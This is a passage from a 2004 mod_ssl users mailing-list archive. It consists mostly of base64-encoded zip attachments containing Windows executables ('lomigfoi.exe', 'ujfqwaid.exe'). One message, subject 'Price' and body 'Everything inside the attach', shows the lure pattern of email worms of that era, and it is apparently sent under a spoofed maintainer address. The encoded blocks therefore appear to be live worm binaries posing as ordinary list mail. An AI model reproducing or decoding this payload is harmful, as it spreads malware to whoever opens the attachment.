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

----------lgipqyawdamstdquvlvi--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 13:37:05 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BF959A8A4B; Mon,  1 Mar 2004 13:37:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from DAVIDB2k (yonkers.belmay.com [63.239.194.2])
	by master.modssl.org (Postfix) with SMTP id D58A9A8972
	for ; Mon,  1 Mar 2004 13:36:52 +0100 (CET)
Date: Mon, 01 Mar 2004 07:39:29 -0500
To: modssl-users@modssl.org
Subject: Price
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------pcqvdgqqjpnjcfdkfkua"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------pcqvdgqqjpnjcfdkfkua
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Everything inside the attach

----------pcqvdgqqjpnjcfdkfkua
Content-Type: application/octet-stream; name="acdcaadbeb.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="aebeacca.zip"

UEsDBAoAAAAAAIA8YTCcSH4MHUcAAB1HAAAMAAAAdWpmcXdhaWQuZXhlTVqQAAMAAAAEAAAA
//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4f
ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K
JAAAAAAAAADOonn7isMXqIrDF6iKwxeoisMXqInDF6gE3ASousMXqGLcEqiLwxeoduMFqIvD
F6hNxRGoi8MXqFJpY2iKwxeoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQAAAAAA
AAAAAAAAAADgAA8BCwEAAAAOAAAAYAAAAAAAAACgAAAAEAAAACAAAAAAQAAAEAAAAAIAAAQA
AAAAAAAABAAAAAAAAAAA4AAAAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAA
AAAAAAAAAAAxogAA0QAAAACQAACgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAKwAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAgAAAAADgAAAAAAAAQNAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAA
